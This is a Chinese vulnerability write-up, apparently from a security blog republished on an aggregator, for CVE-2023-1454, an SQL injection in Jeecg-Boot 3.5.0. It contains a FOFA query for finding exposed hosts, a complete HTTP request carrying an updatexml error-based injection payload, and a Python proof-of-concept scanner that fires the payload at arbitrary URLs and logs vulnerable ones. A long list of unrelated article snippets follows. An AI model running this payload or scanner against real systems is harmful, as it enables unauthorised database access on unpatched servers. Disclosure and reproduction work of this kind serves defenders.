安全攻防赵小龙
安全攻防赵小龙

Jeecg-Boot 存在前台SQL注入漏洞【CVE-2023-1454】

Jeecg-Boot 存在前台SQL注入漏洞【CVE-2023-1454】

  • 一、Jeecg-Boot 简介
  • 二、漏洞描述
  • 三、影响版本
  • 四、fofa查询语句
  • 五、漏洞复现
  • 六、POC&EXP
  • 七、整改意见

一、Jeecg-Boot 简介

eecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发! JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!一系列低代码能力:Online表单、Online报表、Online图表、表单设计、流程设计、报表设计、大屏设计 等等

二、漏洞描述

jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
CVE-2023-1454
CNNVD-202303-1399

三、影响版本

jeecg-boot 3.5.0版本

四、fofa查询语句

body=“jeecg-boot”

五、漏洞复现

漏洞数据包

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 126

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '"}

成功爆出数据库名

六、POC&EXP

if url.endswith("/"):
    path = "jeecg-boot/jmreport/qurestSql"
else:
    path = "/jeecg-boot/jmreport/qurestSql"

if not url.startswith('http://') and not url.startswith('https://'):
    url = 'http://' + url

encodetext = url + path
headers = {
    "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
    "Accept-Encoding": "gzip, deflate",
    "Accept": "*/*",
    "Connection": "close",
    "Content-Type": "application/json"
}
payload = {
    "apiSelectId": "1316997232402231298",
    "id": "1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '"
}

# Convert payload to JSON
json_payload = json.dumps(payload)

try:
    req = requests.post(encodetext, data=json_payload, headers=headers, timeout=5, proxies=self.proxies)
    res = req.text
    if req.status_code == 200 and 'XPATH' in res:
        self.append_to_output(f"[+] {url} 存在Jeecg-Boot前台SQL注入漏洞(CVE-2023-1454)!!!!", "red")
        #self.append_to_output(res, "yellow")
        with open("output.txt", "a") as file:
            file.write(f"[+] {url} 存在Jeecg-Boot前台SQL注入漏洞(CVE-2023-1454)!!!!" + "\n")
            file.write(res + "\n")
    else:
        self.append_to_output(f"[-] {url} 不存在Jeecg-Boot前台SQL注入漏洞(CVE-2023-1454)", "green")
except Timeout:
    self.append_to_output(f"[!] 请求超时,跳过URL: {url}", "yellow")
except Exception as e:

又到了小龙POC梭哈时间
Jeecg-Boot 存在前台SQL注入漏洞【CVE-2023-1454】_第1张图片

七、整改意见

目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:
https://github.com/jeecgboot/jeecg-boot

你可能感兴趣的:(网络安全漏洞复现,rxjava,android)

  • Android 中 函数实现多个返回值的几种方式
    在编程中,函数通常只能返回一个值。但通过使用对象封装、Pair、Triple、数组、列表或Bundle方式,可以轻松地返回多个值。1、对象封装方式创建数据类来封装需要返回的多个值。dataclassResult(valcode:Int,valmessage:String)fungetMultiValues():Result{returnResult(1,"success")}//调用方式valre
  • 手车互联基本介绍 车载开发 手车互联手车互联车载应用
    目前常用的手车互联功能有CarPlay,AndroidAuto,CarLife,HiCar,Carlink等,其中AndrodiAuto在国外用得比较多,国内目前是CarPlay和CarLife比较多,HiCar和Carlink是最近几年才有的,势头也很猛;本人从事车载开发10余年,参与过这些功能的开发和认证,以下从认证的角度给出难易程度,五星最难,CarPlay:☆☆☆☆☆AndroidAuto
  • android led 框架,详解Android应用层制作LED指示灯
    详解Android应用层制作LED指示灯在Java应用层修改LED指示灯的颜色,这个花了我半天时间,才实现该功能!publicclassLEDActivityextendsActivityimplementsView.OnClickListener{privatestaticfinalStringTAG="LED";ButtonmLedTest;intmLedStatus=0;privatefin
  • Android系统LED控制的5层架构与GPIO扩展实现 王元祺
    本文还有配套的精品资源,点击获取简介:在Android系统中,实现LED灯控制需要理解应用程序层、框架层、本地接口层、硬件抽象层和驱动程序层之间的交互。此项目提供了一个多层源码结构示例,包含完整的从App到Drivers的实现,以及对GPIO的扩展支持,适用于2440开发板并可移植到其他板卡。开发者可以深入学习Android硬件控制的机制,以及如何通过不同层次编写代码来管理LED灯的状态。1.An
  • 开源 java android app 开发(十三)绘图定义控件、摇杆控件的制作 ajassi2000 linuxCAndroidApp开发开源javaandroidlinuxpython
    文章的目的为了记录使用java进行androidapp开发学习的经历。本职为嵌入式软件开发,公司安排开发app,临时学习,完成app的开发。开发流程和要点有些记忆模糊,赶紧记录,防止忘记。相关链接:开源javaandroidapp开发(一)开发环境的搭建-CSDN博客开源javaandroidapp开发(二)工程文件结构-CSDN博客开源javaandroidapp开发(三)GUI界面布局和常用组
  • 一站式 IT 资产管理:零信任产品的多维对比 scuter_yu 安全网络
    在数字化转型的浪潮中,企业面临着日益复杂的网络安全挑战,零信任安全理念应运而生并逐渐成为保障企业信息安全的重要手段。腾讯iOA零信任产品、深信服零信任安全解决方案、奇安信零信任安全解决方案以及GoogleBeyondCorp零信任网络架构等产品在市场上各有千秋,尤其在一站式IT资产管理方面,它们展现了不同的特色与优势。以下是对每款产品在一站式IT资产管理方面的分点对比:腾讯iOA零信任产品细粒度统
  • 在Flutter中生成App Bundle并上架Google Play getapi flutter
    Rantool要在Flutter中生成AppBundle并上架GooglePlay,请按照以下步骤操作:1.准备签名密钥首先需要创建一个密钥库用于签名:keytool-genkey-v-keystoreupload-keystore.jks-keyalgRSA-keysize2048-validity10000-aliasupload2.配置签名在项目的android目录下创建key.proper
  • 打造世赛级信息安全实训室:一站式建设方案大揭秘
    在当今数字化时代,信息安全已成为全球关注的焦点。随着信息技术的飞速发展,各类网络安全威胁日益复杂多样,对专业信息安全人才的需求也愈发迫切。世界职业院校技能大赛作为全球最高层级的职业技能赛事,其信息安全项目更是汇聚了各国顶尖的技能人才,展示着这一领域最前沿的技术与应用。打造一个达到世赛级别的信息安全实训室,无疑是培养高素质信息安全人才、提升国家网络安全防御能力的关键举措。以下将为您揭秘一站式建设世赛
  • 网络安全运维与攻防演练综合实训室解决方案 武汉唯众智创 web安全运维安全网络安全运维与攻防演练实训室网络安全运维攻防演练实训室网络安全运维与攻防演练
    一、前言在数字化浪潮席卷全球的当下,网络已深度融入社会的各个层面,成为推动经济发展、社会进步和科技创新的关键力量。从日常生活中的移动支付、社交互动,到企业运营中的数据管理、业务拓展,再到国家关键基础设施的运行,网络的身影无处不在。在日常生活中,我们频繁地在网络上进行各种活动,如网上购物、移动支付、社交互动等,这些活动都涉及到个人敏感信息的传输和存储。一旦这些信息被泄露,个人可能面临财产损失、身份被
  • Python程序设计 第6章:函数和函数式编程 若北辰 Python程序设计python开发语言
    Python程序设计Python是全球范围内最受欢迎的编程语言之一,学好Python将对个人职业生涯产生很大的助力,Python在机器学习、深度学习、数据挖掘等领域应用极为广泛。在数据科学家/数据分析师、人工智能工程师、网络安全工程师、软件工程师/全栈工程师、自动化测试工程师等岗位,年入50万,很普遍,学好Python,高薪就业不是问题,因此推出Python程序设计系列文章:Python程序设计第
  • Vulkan 学习(18)---- 使用 ValidationLayer 小猪佩奇TONY Vulkan学习学习mfcc++
    目录ValidationLayer简介启用ValidationLayerEnableValidationLayer检查扩展支持创建回调函数注册回调函数AndroidValidationLayerValidationLayer简介VulkanAPI的设计是按照最小化驱动程序的开销进行的,所以默认情况下VulkanAPI提供的错误检测的功能非常有限,很多基本的错误都没有被Vulkan显式进行处理,遇到
  • Android应用开发----认识activity
    1.什么是ActivityActivity是一种可以包含用户界面的组件,主要用于和用户进行交互。一个完整的应用程序可以包含零个(很少见)或者多个Activity。说到这可能许多朋友还是无法理解,举个例子,一个可见应用打开界面,它就是Activity。如下图为Boss直聘打开界面,它就是通过activity呈现的,只是利用不同的组件,让其呈现的效果复杂多样化。2.Activity的基本用法---创建
  • Android 高通平台电池已调试好出货,客户要用新电池,驱动如何改用新增电池。 zzq1996 androidelasticsearch大数据
    Android高通平台电池已调试好出货,客户又说要用新电池,驱动如何修改改用新增电池。开发云-一站式云服务平台Android高通平台按如下方法修改可以实现。+++b/kernel/arch/arm/boot/dts/batterydata-mtp-3900mah.dtsi@@-0,0+1,108@@+/*Copyright(c)2013,TheLinuxFoundation.Allrightsre
  • [ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341) 寒蝉听雨[原ID_PowerShell] [靶场实战]vulhubvulhub漏洞复现DrupalXSS漏洞CVE-2019-6341渗透测试网络安全
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!文章目录博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2019-6341环境2、启动CVE-20
  • 高防CDN:网络安全的“盾牌”与加速利器 上海云盾-高防顾问 web安全网络安全
    在数字化时代,网络安全和访问速度是网站运营的两大核心挑战。尤其是面对日益频繁的DDoS攻击和全球用户对快速访问的需求,高防CDN(高防御内容分发网络)成为企业和开发者的重要选择。本文将用通俗易懂的方式,解析高防CDN的概念及其工作原理。什么是高防CDN?高防CDN是融合了CDN加速与DDoS防护能力的网络安全服务。它不仅通过全球分布的节点缓存内容,提升用户访问速度,还能识别并抵御大规模流量攻击(如
  • 揭秘网络安全:数字世界的隐形防线
    目录一、网络安全:数字时代的关键锁钥二、常见网络安全威胁大起底2.1网络诈骗:狡猾的数字陷阱2.2恶意软件:隐匿的数字刺客2.3数据泄露:隐私的无声暴露2.4网络钓鱼:伪装的数字猎手三、筑牢网络安全防线的策略3.1提升安全意识:思想上的防火墙3.2强化密码管理:账户的坚固盾牌3.3谨慎使用公共网络:公共场合的安全警惕3.4定期更新软件和系统:修复漏洞的及时补丁3.5开启防护工具:数字世界的安全卫士
  • 网络安全:构建数字世界的坚实防线
    文章目录网络安全:构建数字世界的坚实防线一、网络安全的重要性1.保护个人隐私2.维护商业利益3.保障国家安全4.防止经济犯罪5.确保业务连续性二、网络安全现状1.数据泄露频发2.隐私保护堪忧3.网络犯罪猖獗三、网络安全防范措施1.密码管理2.个人信息保护3.安全软件和更新4.网络访问控制5.数据备份和恢复6.培养安全意识四、未来展望1.技术创新2.法规完善3.国际合作4.社会共治网络安全:构建数字
  • 用户实体行为分析与数据异常访问联防方案 KKKlucifer 时序数据库
    一、用户实体行为分析(UEBA)技术概述1.1定义与概念用户实体行为分析(UEBA)是一种高级网络安全方法,它利用机器学习和行为分析技术,对用户、设备、应用程序等实体在网络环境中的行为进行深入分析,以检测出异常行为和潜在的安全威胁。UEBA的核心在于通过建立行为基线,识别出偏离正常行为模式的活动,从而发现那些传统安全工具难以检测到的高级、隐藏和内部威胁。1.2工作原理UEBA系统通过收集来自多个数
  • 2025年网络安全研究生选择哪个方向有前景? ~小羊没烦恼~ 网络安全黑客技术黑客web安全安全开发语言网络学习
    写在前面网络空间安全专业越来越受到国家政策的支持;而滴滴APP泄露个人隐私等事件,也使得大众的安全意识和安全需求前所未有的提高。在这样的环境下,越来越多的同学想要攻读网络安全专业,那么问题来了,网安研究生哪个方向更具有前景呢?网安方向介绍BAOYAN首先我们一起来了解一下网络空间安全专业有哪些方向,以及每个方向所需要的基础能力。网安大体可分为5个子方向,分别为密码学与应用安全、量子信息安全、数据安
  • Android 网络全栈攻略(七)—— 从 OkHttp 拦截器来看 HTTP 协议二 tmacfrank Android#网络基础网络androidokhttp
    上一篇我们介绍了OkHttp的责任链以及第一个内置拦截器——重试与重定向拦截器。本篇我们将剩余四个拦截器的解析做完。1、桥接拦截器BridgeInterceptor作为请求准备和实际发送之间的桥梁,自动处理HTTP请求头等繁琐工作。比如设置请求内容长度,编码,gzip压缩,Cookie等,获取响应后保存Cookie等。它的设计目的是为了解决开发者手动处理HTTP协议细节的麻烦,特别是那些必须做但很
  • QNX + Android虚拟化方案深度解析:HQX Display与OpenWFD配置文件揭秘 芯作者 DD:计算机科学领域android
    当QNX遇上Android的显示魔法在智能座舱、工业控制等场景中,QNXHypervisor通过虚拟化技术同时运行安全关键的QNX系统与用户交互的Android系统。而HQXDisplay作为显示核心引擎,基于OpenWFD标准(Khronos组织的无线显示开放标准)实现跨域渲染。本文将以qcdisplaycfg_ADP_STAR_LA.xml为例,深度解析其配置逻辑,揭示多屏协同背后的秘密!一、
  • Android之提示Failed to load WebView provider: No WebView installed 码莎拉蒂 . Andriod积累AndroidFailedtoloadWebViewNoWebViewinstalled
    1问题FatalException:android.util.AndroidRuntimeException:android.webkit.WebViewFactory$MissingWebViewPackageException:FailedtoloadWebViewprovider:NoWebViewinstalledatandroid.webkit.WebViewFactory.getPro
  • Android15音频进阶之HIDL与宏代码调试(一百二十五) Android系统攻城狮 AndroidAudio工程师进阶系列音视频Android15Audio
    简介:CSDN博客专家、《Android系统多媒体进阶实战》一书作者新书发布:《Android系统多媒体进阶实战》优质专栏:Audio工程师进阶系列【原创干货持续更新中……】优质专栏:多媒体系统工程师系列【原创干货持续更新中……】优质视频课程:AAOS车载系统+AOSP14系统攻城狮入门视频实战课
  • 腾讯 iOA 零信任产品:安全远程访问的革新者 scuter_yu 安全
    在当今数字化时代,企业面临着前所未有的挑战与机遇。随着远程办公、多分支运营以及云计算的广泛应用,传统的网络安全架构逐渐暴露出诸多不足。腾讯iOA零信任产品凭借其创新的安全理念和强大的功能特性,为企业提供了一种全新的解决方案,尤其在安全远程访问方面,展现出卓越的优势。一、零信任架构:重塑安全边界传统的网络安全架构依赖于固定的边界,一旦边界被突破,内部网络将面临巨大风险。而腾讯iOA零信任产品基于零信
  • Linux系统简介 strive颖先生
    操作系统(OperatingSystem,简称OS):软件和硬件资源的管理者,他是宇宙中最复杂的软件,对下管理各种硬件,对上为应用程序的运行提供一个平台。主流操作系统PC:Windows,osx,Linux服务器(Server):Unix/Linux,WindowsServer,OSX嵌入式设备(EmbeddedDevice):Linxu,Android,VxWorks,ios,winCE,win
  • android弹窗验证密码,Android 应用安装添加密码输入弹窗 weixin_39861823 android弹窗验证密码
    基于RKAndroid6.0-MID代码packages/apps/PackageInstaller/src/com/android/packageinstaller/PackageInstallerActivity.java为防止之后遗忘,记录一下安装apk时会弹出输入弹窗,输入内容正确,才可以点击安装按钮,输入错误安装应用弹窗消失先引用需要用到的类importandroid.widget.Ed
  • Android开发:管理设备配置更改与广播接收器
    背景简介在Android开发中,确保应用在面对设备配置更改时数据不丢失,以及高效地管理网络请求,是提升用户体验的关键。本篇博客将基于《AndroidDeveloperFundamentalsCourse(V2)》课程内容,探讨如何使用AsyncTaskLoader来处理数据持久化问题,以及如何利用广播接收器来响应系统广播和自定义广播。使用AsyncTaskLoader进行数据持久化当用户旋转设备屏
  • 鸿蒙应用开发全攻略:调试与性能优化实践 vvilkin的学习备忘 #HarmonyOSharmonyos华为
    引言:为什么鸿蒙开发需要特别关注调试与优化?在移动应用开发领域,鸿蒙操作系统(HarmonyOS)作为华为推出的全场景分布式操作系统,为开发者带来了全新的机遇和挑战。与传统的Android/iOS开发相比,鸿蒙开发在分布式能力、跨设备协同和性能优化方面有着独特的要求。据统计,经过充分优化的鸿蒙应用启动速度可提升40%,内存占用减少30%,这直接关系到用户体验和应用市场竞争力。本文将系统性地介绍鸿蒙
  • FastBoot刷机获取root权限(Magisk) white.tie 安卓
    1.首先要下载ADB、Fastboot等工具。1.ADB、Fastboot工具https://developer.android.com/studio/releases/platform-tools2.安装FastBoot的USB驱动https://developer.android.com/studio/run/oem-usb2.下载对应的镜像https://developers.google.
  • 【Android当用户两次打断息屏操作后,屏幕将会在10分钟内无法熄灭并持续点亮(关闭Android13新增的dim功能)】 熊熊饲养员 Android开发笔记android
    UndimDetectorWakeLock持锁导致屏幕不灭问题处理SOP问题描述在AndroidT版本中,系统新增了SCREEN_BRIGHT_WAKE_LOCK(UndimDetectorWakeLock)机制。当设备处于低亮度(dim)状态时,用户两次打断屏幕熄灭操作就会触发系统保持屏幕常亮10分钟,此行为符合系统设计预期。解决方案如需关闭该功能,请按以下步骤修改源码:1.修改源码文件路径:f
  • rust的指针作为函数返回值是直接传递,还是先销毁后创建? wudixiaotie 返回值
     这是我自己想到的问题,结果去知呼提问,还没等别人回答, 我自己就想到方法实验了。。 fn main() { let mut a = 34; println!("a's addr:{:p}", &a); let p = &mut a; println!("p's addr:{:p}", &a
  • java编程思想 -- 数据的初始化 百合不是茶 java数据的初始化
      1.使用构造器确保数据初始化      /* *在ReckInitDemo类中创建Reck的对象 */ public class ReckInitDemo { public static void main(String[] args) { //创建Reck对象 new Reck(); } }
  • [航天与宇宙]为什么发射和回收航天器有档期 comsci
           地球的大气层中有一个时空屏蔽层,这个层次会不定时的出现,如果该时空屏蔽层出现,那么将导致外层空间进入的任何物体被摧毁,而从地面发射到太空的飞船也将被摧毁...        所以,航天发射和飞船回收都需要等待这个时空屏蔽层消失之后,再进行 &
  • linux下批量替换文件内容 商人shang linux替换
    1、网络上现成的资料   格式: sed -i "s/查找字段/替换字段/g" `grep 查找字段 -rl 路径`   linux sed 批量替换多个文件中的字符串   sed -i "s/oldstring/newstring/g" `grep oldstring -rl yourdir`   例如:替换/home下所有文件中的www.admi
  • 网页在线天气预报 oloz 天气预报
    网页在线调用天气预报 <%@ page language="java" contentType="text/html; charset=utf-8" pageEncoding="utf-8"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transit
  • SpringMVC和Struts2比较 杨白白 springMVC
    1. 入口 spring mvc的入口是servlet,而struts2是filter(这里要指出,filter和servlet是不同的。以前认为filter是servlet的一种特殊),这样就导致了二者的机制不同,这里就牵涉到servlet和filter的区别了。 参见:http://blog.csdn.net/zs15932616453/article/details/8832343 2
  • refuse copy, lazy girl! 小桔子 copy
           妹妹坐船头啊啊啊啊!都打算一点点琢磨呢。文字编辑也写了基本功能了。。今天查资料,结果查到了人家写得完完整整的。我清楚的认识到: 1.那是我自己觉得写不出的高度 2.如果直接拿来用,很快就能解决问题 3.然后就是抄咩~~ 4.肿么可以这样子,都不想写了今儿个,留着作参考吧!拒绝大抄特抄,慢慢一点点写!  
  • apache与php整合 aichenglong php apache web
    一  apache web服务器 1 apeche web服务器的安装   1)下载Apache web服务器   2)配置域名(如果需要使用要在DNS上注册)   3)测试安装访问http://localhost/验证是否安装成功 2 apache管理   1)service.msc进行图形化管理   2)命令管理,配
  • Maven常用内置变量 AILIKES maven
    Built-in properties ${basedir} represents the directory containing pom.xml ${version} equivalent to ${project.version} (deprecated: ${pom.version}) Pom/Project properties Al
  • java的类和对象 百合不是茶 JAVA面向对象 类 对象
    java中的类:     java是面向对象的语言,解决问题的核心就是将问题看成是一个类,使用类来解决   java使用 class 类名   来创建类 ,在Java中类名要求和构造方法,Java的文件名是一样的   创建一个A类: class A{ }   java中的类:将某两个事物有联系的属性包装在一个类中,再通
  • JS控制页面输入框为只读 bijian1013 JavaScript
    在WEB应用开发当中,增、删除、改、查功能必不可少,为了减少以后维护的工作量,我们一般都只做一份页面,通过传入的参数控制其是新增、修改或者查看。而修改时需将待修改的信息从后台取到并显示出来,实际上就是查看的过程,唯一的区别是修改时,页面上所有的信息能修改,而查看页面上的信息不能修改。因此完全可以将其合并,但通过前端JS将查看页面的所有信息控制为只读,在信息量非常大时,就比较麻烦。  
  • AngularJS与服务器交互 bijian1013 JavaScriptAngularJS$http
            对于AJAX应用(使用XMLHttpRequests)来说,向服务器发起请求的传统方式是:获取一个XMLHttpRequest对象的引用、发起请求、读取响应、检查状态码,最后处理服务端的响应。整个过程示例如下: var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange
  • [Maven学习笔记八]Maven常用插件应用 bit1129 maven
    常用插件及其用法位于:http://maven.apache.org/plugins/   1. Jetty server plugin 2. Dependency copy plugin 3. Surefire Test plugin 4. Uber jar plugin           1. Jetty Pl
  • 【Hive六】Hive用户自定义函数(UDF) bit1129 自定义函数
    1. 什么是Hive UDF Hive是基于Hadoop中的MapReduce,提供HQL查询的数据仓库。Hive是一个很开放的系统,很多内容都支持用户定制,包括: 文件格式:Text File,Sequence File 内存中的数据格式: Java Integer/String, Hadoop IntWritable/Text 用户提供的 map/reduce 脚本:不管什么
  • 杀掉nginx进程后丢失nginx.pid,如何重新启动nginx ronin47 nginx 重启 pid丢失
    nginx进程被意外关闭,使用nginx -s reload重启时报如下错误:nginx: [error] open() “/var/run/nginx.pid” failed (2: No such file or directory)这是因为nginx进程被杀死后pid丢失了,下一次再开启nginx -s reload时无法启动解决办法:nginx -s reload 只是用来告诉运行中的ng
  • UI设计中我们为什么需要设计动效 brotherlamp UIui教程ui视频ui资料ui自学
    随着国际大品牌苹果和谷歌的引领,最近越来越多的国内公司开始关注动效设计了,越来越多的团队已经意识到动效在产品用户体验中的重要性了,更多的UI设计师们也开始投身动效设计领域。 但是说到底,我们到底为什么需要动效设计?或者说我们到底需要什么样的动效?做动效设计也有段时间了,于是尝试用一些案例,从产品本身出发来说说我所思考的动效设计。 一、加强体验舒适度 嗯,就是让用户更加爽更加爽的用你的产品。
  • Spring中JdbcDaoSupport的DataSource注入问题 bylijinnan javaspring
    参考以下两篇文章: http://www.mkyong.com/spring/spring-jdbctemplate-jdbcdaosupport-examples/ http://stackoverflow.com/questions/4762229/spring-ldap-invoking-setter-methods-in-beans-configuration Sprin
  • 数据库连接池的工作原理 chicony 数据库连接池
           随着信息技术的高速发展与广泛应用,数据库技术在信息技术领域中的位置越来越重要,尤其是网络应用和电子商务的迅速发展,都需要数据库技术支持动 态Web站点的运行,而传统的开发模式是:首先在主程序(如Servlet、Beans)中建立数据库连接;然后进行SQL操作,对数据库中的对象进行查 询、修改和删除等操作;最后断开数据库连接。使用这种开发模式,对
  • java 关键字 CrazyMizzz java
    关键字是事先定义的,有特别意义的标识符,有时又叫保留字。对于保留字,用户只能按照系统规定的方式使用,不能自行定义。 Java中的关键字按功能主要可以分为以下几类:    (1)访问修饰符       public,private,protected       p
  • Hive中的排序语法 daizj 排序hiveorder byDISTRIBUTE BYsort by
    Hive中的排序语法 2014.06.22 ORDER BY hive中的ORDER BY语句和关系数据库中的sql语法相似。他会对查询结果做全局排序,这意味着所有的数据会传送到一个Reduce任务上,这样会导致在大数量的情况下,花费大量时间。 与数据库中 ORDER BY 的区别在于在hive.mapred.mode = strict模式下,必须指定 limit 否则执行会报错。
  • 单态设计模式 dcj3sjt126com 设计模式
      单例模式(Singleton)用于为一个类生成一个唯一的对象。最常用的地方是数据库连接。 使用单例模式生成一个对象后,该对象可以被其它众多对象所使用。 <?phpclass Example{    // 保存类实例在此属性中    private static&
  • svn locked dcj3sjt126com Lock
    post-commit hook failed (exit code 1) with output: svn: E155004: Working copy 'D:\xx\xxx' locked svn: E200031: sqlite: attempt to write a readonly database svn: E200031: sqlite: attempt to write a
  • ARM寄存器学习 e200702084 数据结构C++cC#F#
    无论是学习哪一种处理器,首先需要明确的就是这种处理器的寄存器以及工作模式。     ARM有37个寄存器,其中31个通用寄存器,6个状态寄存器。 1、不分组寄存器(R0-R7)     不分组也就是说说,在所有的处理器模式下指的都时同一物理寄存器。在异常中断造成处理器模式切换时,由于不同的处理器模式使用一个名字相同的物理寄存器,就是
  • 常用编码资料 gengzg 编码
    List<UserInfo> list=GetUserS.GetUserList(11); String json=JSON.toJSONString(list); HashMap<Object,Object> hs=new HashMap<Object, Object>(); for(int i=0;i<10;i++) {
  • 进程 vs. 线程 hongtoushizi 线程linux进程
    我们介绍了多进程和多线程,这是实现多任务最常用的两种方式。现在,我们来讨论一下这两种方式的优缺点。 首先,要实现多任务,通常我们会设计Master-Worker模式,Master负责分配任务,Worker负责执行任务,因此,多任务环境下,通常是一个Master,多个Worker。 如果用多进程实现Master-Worker,主进程就是Master,其他进程就是Worker。 如果用多线程实现
  • Linux定时Job:crontab -e 与 /etc/crontab 的区别 Josh_Persistence linuxcrontab
    一、linux中的crotab中的指定的时间只有5个部分:* * * * * 分别表示:分钟,小时,日,月,星期,具体说来: 第一段 代表分钟 0—59 第二段 代表小时 0—23 第三段 代表日期 1—31 第四段 代表月份 1—12 第五段 代表星期几,0代表星期日 0—6   如: */1 * * * *   每分钟执行一次。 *
  • KMP算法详解 hm4123660 数据结构C++算法字符串KMP
         字符串模式匹配我们相信大家都有遇过,然而我们也习惯用简单匹配法(即Brute-Force算法),其基本思路就是一个个逐一对比下去,这也是我们大家熟知的方法,然而这种算法的效率并不高,但利于理解。       假设主串s="ababcabcacbab",模式串为t="
  • 枚举类型的单例模式 zhb8015 单例模式
    E.编写一个包含单个元素的枚举类型[极推荐]。代码如下: public enum MaYun {himself; //定义一个枚举的元素,就代表MaYun的一个实例private String anotherField;MaYun() {//MaYun诞生要做的事情//这个方法也可以去掉。将构造时候需要做的事情放在instance赋值的时候:/** himself = MaYun() {*
  • Kafka+Storm+HDFS ssydxa219 storm
    cd /myhome/usr/stormbin/storm nimbus &amp;bin/storm supervisor &amp;bin/storm ui &amp;Kafka+Storm+HDFS整合实践kafka_2.9.2-0.8.1.1.tgzapache-storm-0.9.2-incubating.tar.gzKafka安装配置我们使用3台机器搭建Kafk
  • Java获取本地服务器的IP 中华好儿孙 javaWeb获取服务器ip地址
    System.out.println("getRequestURL:"+request.getRequestURL()); System.out.println("getLocalAddr:"+request.getLocalAddr()); System.out.println("getLocalPort:&quo
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他